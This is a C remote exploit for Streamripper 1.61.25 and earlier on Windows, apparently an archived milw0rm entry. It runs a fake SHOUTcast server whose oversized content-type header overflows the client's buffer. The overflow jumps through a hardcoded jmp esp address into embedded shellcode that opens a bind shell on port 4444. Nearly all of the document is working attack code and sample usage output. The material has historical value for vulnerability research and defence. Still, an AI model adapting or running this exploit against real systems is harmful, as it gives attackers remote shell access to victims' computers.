Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)

/*   
 * name:		streamripper  <= 1.61.25 win32 remote exploit
 * 
 * bug by:		Ulf Harnhammar
 * status:		public 
 * exploit:		psylocn
 * payload:		portbind 4444
 * **********************************************************
 * K:\>exploit.exe 80 0
 * [ public-release ]                                            
 *        streamripper  <= 1.61.25 remote exploit               
 *        exploit by psylocn 2006                               
 *        bug by Ulf Harnhammar                                 
 *                                                              
 * [+] server started!                                           
 * [+] server waits                                              
 *                   
 * 
 * go to next shell
 * K:\>streamripper.exe http://127.0.0.1:80
 * Connecting...
 * 
 * on other shell
 * [+] client conneted!                                          
 * [+] exploit send check shell on port 4444 
 *
 * now connect to 127.0.0.1:4444  
*/

/* #define _WIN32 */  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
  
#ifdef _WIN32  
#include <winsock2.h>  
#pragma comment(lib, "ws2_32")  
#else  
#include <sys/types.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#endif  

/* portbind shellcode port 4444*/  
unsigned char portbindsc[] =   
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"
"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"
"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"
"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"
"\x03\x3b\x38\x5e\xa8\x7e\x32\x27\xae\x7d\x13\xde\x94\xeb\xdc\x02"
"\xda\x5a\x73\x75\x8b\xbe\x13\x4c\x24\xb3\xb3\xa1\xf0\xa3\xf9\xc1"
"\xac\x93\x73\xa3\xc3\x9b\xe4\x4b\x6c\x8e\x23\x4e\x24\xfc\xc8\xa1"
"\xef\xb3\x73\x5a\xb3\x12\x73\x6a\xa7\xe1\x90\xa4\xe1\xb1\x14\x7a"
"\x50\x69\x9e\x79\xc9\xd7\xcb\x18\xc7\xc8\x8b\x18\xf0\xeb\x07\xfa"
"\xc7\x74\x15\xd6\x94\xef\x07\xfc\xf0\x36\x1d\x4c\x2e\x52\xf0\x28"
"\xfa\xd5\xfa\xd5\x7f\xd7\x21\x23\x5a\x12\xaf\xd5\x79\xec\xab\x79"
"\xfc\xec\xbb\x79\xec\xec\x07\xfa\xc9\xd7\xe9\x76\xc9\xec\x71\xcb"
"\x3a\xd7\x5c\x30\xdf\x78\xaf\xd5\x79\xd5\xe8\x7b\xfa\x40\x28\x42"
"\x0b\x12\xd6\xc3\xf8\x40\x2e\x79\xfa\x40\x28\x42\x4a\xf6\x7e\x63"
"\xf8\x40\x2e\x7a\xfb\xeb\xad\xd5\x7f\x2c\x90\xcd\xd6\x79\x81\x7d"
"\x50\x69\xad\xd5\x7f\xd9\x92\x4e\xc9\xd7\x9b\x47\x26\x5a\x92\x7a"
"\xf6\x96\x34\xa3\x48\xd5\xbc\xa3\x4d\x8e\x38\xd9\x05\x41\xba\x07"
"\x51\xfd\xd4\xb9\x22\xc5\xc0\x81\x04\x14\x90\x58\x51\x0c\xee\xd5"
"\xda\xfb\x07\xfc\xf4\xe8\xaa\x7b\xfe\xee\x92\x2b\xfe\xee\xad\x7b"
"\x50\x6f\x90\x87\x76\xba\x36\x79\x50\x69\x92\xd5\x50\x88\x07\xfa"
"\x24\xe8\x04\xa9\x6b\xdb\x07\xfc\xfd\x40\x28\x42\x5f\x35\xfc\x75"
"\xfc\x40\x2e\xd5\x7f\xbf\xf8\x2a\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc";  
 
char part1[] = "ICY 200 OK\r\nicy-notice1:aaaaa\r\n"
                   "icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7<BR>\r\n"
                   "icy-name:Radioseven - www.radio.de\r\n"
                   "icy-genre:Dance Trance House\r\n"
                   "icy-url:http://www.radio.de\r\n"
                   "content-type:";                 //buffer to exploit
                   
char part2[] = "\r\n"
                   "icy-pub:1\r\n"
                   "icy-metaint:8192\r\n"
                   "icy-br:CCCCCCC\r\n\r\n";
                   
char fixstack[] = "\x81\xc4\xff\xef\xff\xff\x44"; //sub esp, 4097 + inc esp

struct targets {  
	int	num;  
	char	name[50];  
	long	jmpaddr;  
}  
target[]= {  
    { 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp 
    { 1, "debug [testing] ", 0x41414141 },
};  

void Usage(){
	
	int i;
	printf("Usage: exploit.exe port target\n\n"				
			   "Targets:\n\n");
	for (i = 0; i < 2; i++)
	{
		if(target[i].name != 0)
			fprintf(stderr," [%u] %s\n",i,target[i].name);
		else
			break;
	}
	exit(1);
}  

int  main (int argc, char **argv)  {  
  
	char *host;  
	struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;
    int sockfd,port,new_sock,sin_size=sizeof (their_addr);  
	   

	char buffer[3565];	 
  
#ifdef _WIN32  
	WSADATA wsa;  
#endif  
  

#ifdef _WIN32  
	 WSAStartup(MAKEWORD(2,0), &wsa);  
#endif  
  
	printf("[ public-release ]\n");
	printf("\tstreamripper  <= 1.61.25 remote exploit \n");  
	printf("\texploit by psylocn 2006\n");  
	printf("\tbug by Ulf Harnhammar\n\n"); 
	
	unsigned long ntarget = 0;
	if (argc < 3) Usage(); 
    if ((ntarget = atoi(argv[2])) > 1) Usage(); 
 
    port = (unsigned short)atoi(argv[1]);

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {  
		printf("[-] socket error\n");  
		return 0;  
	}
	
    my_addr.sin_family = AF_INET;         
    my_addr.sin_port = htons(port);
    my_addr.sin_addr.s_addr = INADDR_ANY;   
	
	if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {  
		printf("\n[-] bind error\n");  
		return 0;  
	}
    else printf ("[+] server started!\n");
    
    if (listen (sockfd, 3) == SOCKET_ERROR)  {  
		printf("\n[-] listen error\n");  
		return 0;  
	}
	printf ("[+] server waits\n");
	
	if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size))  == INVALID_SOCKET)  {  
		printf("\n[-] accept error\n");  
		return 0;  
	}
 	else
 	printf ("[+] client conneted!\n");
   
    memset ( buffer, 0x90, sizeof(buffer) - 1 );
    memcpy ( buffer, part1, strlen(part1) );
    memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
    memcpy ( buffer+3150, fixstack,strlen(fixstack) );
    memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));
    
    memcpy ( buffer+3515, part2, sizeof(part2) );
	
	if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {  
		printf("[-] send error\n");  
		return 0;  
	}
	sleep(2000);
    printf("[+] exploit send check shell on port 4444\n");  

	closesocket(sockfd);  
#ifdef _WIN32 
  WSACleanup ();
#endif   
return 0;  
} 

// milw0rm.com [2006-08-29]